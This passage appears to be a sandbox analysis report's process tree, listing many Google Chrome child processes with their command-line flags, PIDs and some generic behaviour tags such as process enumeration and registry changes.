C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6324 /prefetch:82⤵PID:5004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:82⤵PID:4568
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6460 /prefetch:82⤵PID:4456
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:82⤵PID:2492
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵PID:4896
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2084 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3032 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:82⤵PID:2320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=832 /prefetch:82⤵PID:2476
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4704 /prefetch:82⤵PID:4900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:82⤵PID:3032
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵PID:4884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵PID:4560
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:82⤵PID:904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:82⤵PID:4340
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1468 /prefetch:82⤵PID:1048
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5580 /prefetch:82⤵PID:480
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:82⤵PID:3800
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5652 /prefetch:82⤵PID:4284
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1392 /prefetch:82⤵PID:4804
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1548 /prefetch:82⤵PID:4332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5004 /prefetch:82⤵PID:2152
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:82⤵PID:3548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6796 /prefetch:82⤵PID:4088
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:12⤵PID:180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:3824
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:12⤵PID:5020
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4736 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6588 /prefetch:82⤵PID:3320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:12⤵PID:3496
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6564 /prefetch:82⤵PID:4860
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1460 /prefetch:82⤵PID:1388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2352 /prefetch:82⤵PID:4748
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5648 /prefetch:82⤵PID:3192
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:82⤵PID:4984
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6124 /prefetch:82⤵PID:3948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6392 /prefetch:82⤵PID:3044
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6440 /prefetch:82⤵PID:3564
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6896 /prefetch:82⤵PID:1120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:82⤵PID:2152
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:12⤵PID:4668
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:12⤵PID:4700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:12⤵PID:3088
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:4040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:82⤵PID:3928
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3148 /prefetch:82⤵PID:1756
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6860 /prefetch:82⤵PID:3064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:82⤵PID:3536
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6856 /prefetch:82⤵PID:896
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7108 /prefetch:82⤵PID:3320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6468 /prefetch:82⤵PID:216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6992 /prefetch:82⤵PID:3876
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5836 /prefetch:82⤵PID:408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:1480
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6552 /prefetch:82⤵PID:1300
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:82⤵PID:3508
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6736 /prefetch:82⤵PID:700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:82⤵PID:812
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5560 /prefetch:82⤵PID:1388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:82⤵PID:1384
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3824 /prefetch:82⤵PID:1944
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:82⤵PID:2932
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 /prefetch:82⤵PID:4228
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:4504
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:12⤵PID:3352
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:12⤵PID:1120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5900 /prefetch:82⤵PID:4780
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4568 /prefetch:82⤵PID:1808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6668 /prefetch:82⤵PID:2948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4708 /prefetch:82⤵PID:3404
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:12⤵PID:904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3864 /prefetch:82⤵PID:2292
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:896
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:12⤵PID:3220
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:12⤵PID:624
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:12⤵PID:3608
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:12⤵PID:2684
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:3216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:4808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6536 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4840 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1608,1308084782708345309,2075567892274126215,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
